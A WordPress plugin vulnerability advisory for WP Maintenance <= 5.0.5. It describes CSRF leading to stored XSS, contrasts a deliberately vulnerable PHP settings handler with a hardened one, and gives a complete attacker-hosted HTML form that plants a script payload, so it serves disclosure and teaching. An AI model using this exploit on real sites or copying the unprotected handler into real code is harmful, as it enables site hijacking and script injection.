WP Maintenance <= 5.0.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting
Description
The plugin's settings form has no nonce protection: the settings-update POST is accepted on the strength of the administrator's session cookies alone, so an attacker-controlled page can forge it on behalf of a logged-in administrator (CSRF). The submitted values are stored without input sanitization and rendered without output escaping, so the forged request can place JavaScript in a setting (for example the newsletter title) that later executes as stored XSS for users who view the affected page.
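As an added example, not code from the WP Maintenance plugin or from the original advisory, the following PHP contrasts a minimal WordPress settings handler that has the two defects described above (no nonce check, no sanitization or escaping) with a hardened version that adds a capability check, a nonce check, input sanitization and output escaping. Function, option and nonce names prefixed `wpm_example_` are hypothetical; the request field names follow the proof of concept.

```php
<?php
// Added example, not the WP Maintenance plugin's own code: a minimal
// WordPress settings handler showing the two defects described above
// (no nonce check, no sanitization or escaping) next to a hardened
// version. Names prefixed wpm_example_ are hypothetical; the request
// field names follow the proof of concept.

// --- Vulnerable pattern ---------------------------------------------------

function wpm_example_save_settings_vulnerable() {
    if ( ! isset( $_POST['action'] ) || 'update_general' !== $_POST['action'] ) {
        return;
    }
    // No check_admin_referer(): any site can make a logged-in admin's
    // browser send this POST, and the session cookies alone authenticate it.
    $settings = $_POST['wp_maintenance_settings'];
    // No sanitization: "<script>alert(1)</script>" is stored verbatim.
    update_option( 'wpm_example_settings', $settings );
}

function wpm_example_render_newsletter_title_vulnerable() {
    $settings = get_option( 'wpm_example_settings', array() );
    // No escaping: the stored payload executes for whoever views this.
    echo '<h2>' . $settings['title_newletter'] . '</h2>';
}

// --- Hardened pattern -----------------------------------------------------

function wpm_example_settings_form_hardened() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=wp-maintenance' ) ) . '">';
    // Emits a hidden field carrying a nonce bound to this user and this
    // action (plus _wp_http_referer). An attacker's page cannot know its value.
    wp_nonce_field( 'wpm_example_update_general', 'wpm_example_nonce' );
    echo '<input type="hidden" name="action" value="update_general">';
    echo '<input type="text" name="wp_maintenance_settings[title_newletter]">';
    echo '<input type="submit" value="Save Changes">';
    echo '</form>';
}

function wpm_example_save_settings_hardened() {
    if ( ! isset( $_POST['action'] ) || 'update_general' !== $_POST['action'] ) {
        return;
    }
    // Capability check: only users allowed to change options may save.
    // A nonce proves intent, not authorization, so both checks are needed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // CSRF check: dies unless the POST carries a valid nonce for this
    // action, which a cross-site form cannot supply.
    check_admin_referer( 'wpm_example_update_general', 'wpm_example_nonce' );

    $raw = isset( $_POST['wp_maintenance_settings'] ) && is_array( $_POST['wp_maintenance_settings'] )
        ? wp_unslash( $_POST['wp_maintenance_settings'] )
        : array();

    // Input sanitization: keep only known keys and coerce each to its
    // expected shape instead of storing the raw array.
    $clean = array(
        'title_newletter'  => sanitize_text_field( $raw['title_newletter'] ?? '' ),
        'text_maintenance' => wp_kses_post( $raw['text_maintenance'] ?? '' ), // limited safe HTML only
        'newletter'        => empty( $raw['newletter'] ) ? 0 : 1,
    );
    update_option( 'wpm_example_settings', $clean );
}

function wpm_example_render_newsletter_title_hardened() {
    $settings = get_option( 'wpm_example_settings', array() );
    // Output escaping: even a value that slipped past sanitization is
    // rendered as text, not markup.
    echo '<h2>' . esc_html( $settings['title_newletter'] ?? '' ) . '</h2>';
}

// Hook the hardened handler into the admin request cycle (hypothetical hook point).
add_action( 'admin_init', 'wpm_example_save_settings_hardened' );
```

Sanitizing on input and escaping on output are independent layers: `sanitize_text_field()` strips tags from the stored value, and `esc_html()` guarantees that whatever is stored cannot be interpreted as markup when rendered, so a payload that bypasses one is still stopped by the other. The nonce check must sit beside, not replace, the `current_user_can()` check.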
Proof of Concept
<!-- Attacker-hosted page. When a victim who is logged in to the target site as an
     administrator submits (or is made to submit) this form, the browser attaches the
     WordPress session cookies to the cross-site POST and the plugin saves the settings
     without any nonce check. Replace URL with the target site's host. -->
<html>
  <body>
   <form action="http://URL/wp-admin/admin.php?page=wp-maintenance" method="POST">
      <input type="hidden" name="action" value="update_general" />
      <input type="hidden" name="wp_maintenance_active" value="1" />
      <input type="hidden" name="wp_maintenance_settings[titre_maintenance]" value="Whatever" />
      <input type="hidden" name="wp_maintenance_settings[text_maintenance]" value="Come back quickly!" />
      <input type="hidden" name="wp_maintenance_settings[text_bt_maintenance]" value="" />
      <input type="hidden" name="wp_maintenance_settings[add_wplogin]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[add_wplogin_title]" value="" />
      <input type="hidden" name="wp_maintenance_settings[enable_seo]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[seo_title]" value="" />
      <input type="hidden" name="wp_maintenance_settings[seo_description]" value="" />
      <input type="hidden" name="wp_maintenance_settings[favicon]" value="" />
      <input type="hidden" name="wp_maintenance_settings[code_analytics]" value="" />
      <input type="hidden" name="wp_maintenance_settings[domain_analytics]" value="URL" />
      <input type="hidden" name="wp_maintenance_social_options[enable]" value="0" />
      <input type="hidden" name="wp_maintenance_social_options[texte]" value="" />
      <input type="hidden" name="wp_maintenance_social[facebook]" value="" />
      <input type="hidden" name="wp_maintenance_social[twitter]" value="" />
      <input type="hidden" name="wp_maintenance_social[linkedin]" value="" />
      <input type="hidden" name="wp_maintenance_social[flickr]" value="" />
      <input type="hidden" name="wp_maintenance_social[youtube]" value="" />
      <input type="hidden" name="wp_maintenance_social[pinterest]" value="" />
      <input type="hidden" name="wp_maintenance_social[vimeo]" value="" />
      <input type="hidden" name="wp_maintenance_social[instagram]" value="" />
      <input type="hidden" name="wp_maintenance_social[google_plus]" value="" />
      <input type="hidden" name="wp_maintenance_social[about_me]" value="" />
      <input type="hidden" name="wp_maintenance_social[soundcloud]" value="" />
      <input type="hidden" name="wp_maintenance_social[skype]" value="" />
      <input type="hidden" name="wp_maintenance_social[tumblr]" value="" />
      <input type="hidden" name="wp_maintenance_social[blogger]" value="" />
      <input type="hidden" name="wp_maintenance_social[paypal]" value="" />
      <input type="hidden" name="wp_maintenance_social_options[size]" value="32" />
      <input type="hidden" name="wp_maintenance_social_options[style]" value="style1" />
      <input type="hidden" name="wp_maintenance_social_options[position]" value="bottom" />
      <input type="hidden" name="wp_maintenance_social_options[align]" value="center" />
      <input type="hidden" name="wp_maintenance_social_options[theme]" value="" />
      <input type="hidden" name="wp_maintenance_social_options[reset]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[newletter]" value="1" />
      <!-- Stored XSS payload: saved without sanitization and rendered without escaping. -->
      <input type="hidden" name="wp_maintenance_settings[title_newletter]" value="<script>alert(1)</script>" />
      <input type="hidden" name="wp_maintenance_settings[type_newletter]" value="shortcode" />
      <input type="hidden" name="wp_maintenance_settings[code_newletter]" value="" />
      <input type="hidden" name="wp_maintenance_settings[iframe_newletter]" value="" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 5.0.7

References

URL https://www.wordfence.com/blog/2019/11/high-severity-vulnerability-patched-in-wp-maintenance-plugin/
URL https://plugins.trac.wordpress.org/changeset/2194668/wp-maintenance

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 7113
Verified No
WPVDB ID 9954

Timeline

Publicly Published 2019-11-19
Added 2019-11-19
Last Updated 2019-11-28
